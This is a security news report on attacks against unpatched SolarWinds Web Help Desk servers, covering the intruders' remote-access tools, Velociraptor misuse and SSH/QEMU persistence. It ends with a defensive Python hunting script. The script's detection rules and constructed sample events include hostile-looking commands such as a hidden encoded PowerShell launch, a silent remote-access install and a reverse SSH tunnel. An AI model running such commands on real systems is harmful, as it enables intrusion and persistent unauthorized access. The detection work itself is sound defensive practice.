Active Attacks Target Unpatched SolarWinds WHD Systems

Summary
– Threat actors are exploiting vulnerable SolarWinds Web Help Desk instances to gain initial access to organizational networks.
– Once inside, attackers deploy legitimate tools like Zoho Assist and Velociraptor for remote access, data collection, and disabling security controls.
– The attackers establish persistent access through methods like a reverse SSH shell and scheduled tasks using a QEMU virtual machine.
– The exact vulnerability being exploited is unclear, but applying the latest SolarWinds WHD patch and rotating credentials is critical.
– These intrusions, observed since at least mid-January, could be for espionage or financial motives, and require a review of systems for unauthorized tools.
Organizations using SolarWinds Web Help Desk software are facing a serious security threat, as attackers actively exploit unpatched systems to infiltrate corporate networks. Security teams from Microsoft and Huntress have issued warnings about these ongoing campaigns, where compromised systems are used to deploy legitimate tools for malicious purposes, creating a stealthy and persistent threat.
The attackers are gaining entry through known vulnerabilities in the SolarWinds WHD platform. The exact vulnerability being leveraged in these recent attacks remains unclear, as the targeted systems were susceptible to multiple known security flaws simultaneously. Once inside, the threat actors avoid using easily detectable malware. Instead, they employ “living-off-the-land” techniques, utilizing software already present or considered legitimate. A key step involves installing a Zoho Assist remote access agent, which provides them with direct, hands-on control of the victim’s machine.
From this position, the attackers scout the network, identifying other computers and user accounts, including those with domain administrator privileges. They then deploy an outdated version of the Velociraptor digital forensics tool. While designed for security investigations, this tool can be weaponized. When connected to an attacker’s server, Velociraptor functions as a powerful command-and-control framework, enabling remote execution, file theft, and disabling of critical security software like Windows Defender and the system firewall.
The infrastructure used in these attacks shows connections to previous malicious campaigns. The attackers’ Velociraptor server is hosted on a Cloudflare Worker account that has been linked to other intrusions, including those involving ToolShell exploits and Warlock ransomware deployments. To ensure they maintain access, the attackers establish multiple persistence mechanisms. This includes creating a reverse SSH tunnel and setting up scheduled tasks that use a QEMU virtual machine to open an SSH backdoor, providing a resilient fallback channel.
These intrusions were first detected in early February, but evidence suggests the activity may have begun in mid-January or even earlier. Huntress observed the exploitation across a small percentage of its customers using SolarWinds WHD. The ultimate goal of these breaches is not yet certain; they could be for cyber espionage or the initial stages of a ransomware attack.
To defend against this threat, immediate action is required. The most critical step is to apply the latest SolarWinds WHD patch, specifically version 2026.1 or newer. Security teams should also rotate all service and admin account credentials accessible from the WHD system and ensure administrative interfaces are not exposed to the public internet. A thorough review of affected hosts is necessary to hunt for signs of compromise, including unauthorized tools like Zoho Assist or Velociraptor, unexpected services, encoded PowerShell scripts, and silent software installations launched by the WHD service process. Both Microsoft and Huntress have published detailed indicators of compromise and hunting rules to assist defenders in identifying this activity within their environments.
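The host review described above can be scripted. The following is an added example (not code from Help Net Security, Microsoft or Huntress) that runs those hunting points over constructed Windows process-creation records: Zoho Assist or Velociraptor binaries, encoded PowerShell (the `-EncodedCommand` payload is decoded so an analyst can read it), silent `msiexec` installs and shells spawned by the WHD service process, scheduled tasks whose action runs QEMU, and reverse SSH tunnels. The article does not name the WHD service process image, so `WHD_PARENT_PLACEHOLDER` is an assumption to be replaced with the name observed on your own servers; all sample events and the `203.0.113.10` address are constructed.

```python
"""Hunting checks for the SolarWinds WHD intrusion pattern (added example)."""
import base64
import re
from dataclasses import dataclass

# ASSUMPTION: the article does not give the WHD service image name; replace
# this placeholder with the parent process name seen on your WHD hosts.
WHD_PARENT_PLACEHOLDER = "whd-service-placeholder.exe"


@dataclass
class ProcEvent:
    parent_image: str   # image name of the parent process
    image: str          # image name of the created process
    command_line: str   # full command line of the created process


# PowerShell accepts any prefix of -EncodedCommand (-e, -ec, -enc ...), so match
# "-e<letters>" followed by a long base64 token; short values such as
# "-ExecutionPolicy Bypass" fall below the length floor and are ignored.
_ENC_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_powershell(command_line):
    """Return the decoded -EncodedCommand script, or None when absent/invalid."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        # EncodedCommand is base64 over UTF-16LE text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events, whd_parents=(WHD_PARENT_PLACEHOLDER,)):
    """Return (rule, image, detail) findings for the hunting points in the article."""
    whd = {p.lower() for p in whd_parents}
    findings = []
    for ev in events:
        img, parent = _basename(ev.image), _basename(ev.parent_image)
        cl = ev.command_line.lower()
        # 1. Remote-access / DFIR tools named in the article; verify against your
        #    own approved-software list before treating as malicious.
        if any(t in img or t in cl for t in ("velociraptor", "zoho")):
            findings.append(("unauthorized_tool", img, ev.command_line))
        # 2. Encoded PowerShell, reported with the decoded script.
        if img in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_powershell(ev.command_line)
            if decoded is not None:
                findings.append(("encoded_powershell", img, decoded))
        # 3. Silent installs or shells launched by the WHD service process.
        if parent in whd:
            if img == "msiexec.exe" and re.search(r"/q[nb]?\b|/quiet", cl):
                findings.append(("silent_install_from_whd", img, ev.command_line))
            elif img in ("cmd.exe", "powershell.exe", "pwsh.exe"):
                findings.append(("shell_from_whd", img, ev.command_line))
        # 4. Scheduled task whose action starts a QEMU virtual machine.
        if img == "schtasks.exe" and "/create" in cl and "qemu" in cl:
            findings.append(("qemu_scheduled_task", img, ev.command_line))
        # 5. Reverse SSH tunnel: -R forwards a remote port back to this host.
        if img == "ssh.exe" and re.search(r"(?:^|\s)-R\s", ev.command_line):
            findings.append(("reverse_ssh", img, ev.command_line))
    return findings


# Constructed sample telemetry (not real events). The encoded payload is a
# harmless "Get-Date" so the decoder's output is easy to verify.
SAMPLE_ENCODED = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(WHD_PARENT_PLACEHOLDER, "msiexec.exe", "msiexec.exe /i ZohoAssist.msi /qn"),
    ProcEvent(WHD_PARENT_PLACEHOLDER, "powershell.exe",
              "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED),
    ProcEvent("explorer.exe", r"C:\ProgramData\velociraptor.exe",
              "velociraptor.exe --config client.yaml client"),
    ProcEvent("svchost.exe", "schtasks.exe",
              r'schtasks.exe /create /tn Updater /tr "C:\tools\qemu-system-x86_64.exe -hda disk.qcow2" /sc onstart'),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe readme.txt"),
    ProcEvent("cmd.exe", "ssh.exe", "ssh.exe -N -R 2222:localhost:22 user@203.0.113.10"),
]

if __name__ == "__main__":
    for rule, image, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:24} {image:16} {detail}")
```

Feed `hunt()` with process-creation records exported from your EDR or Sysmon (event ID 1) rather than the constructed list, and extend `whd_parents` with the service image name seen on your hosts. The rules are deliberately narrow so that hits are worth an analyst's time; each finding should be tied back to the published Microsoft and Huntress indicators before escalation.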
(Source: HelpNet Security)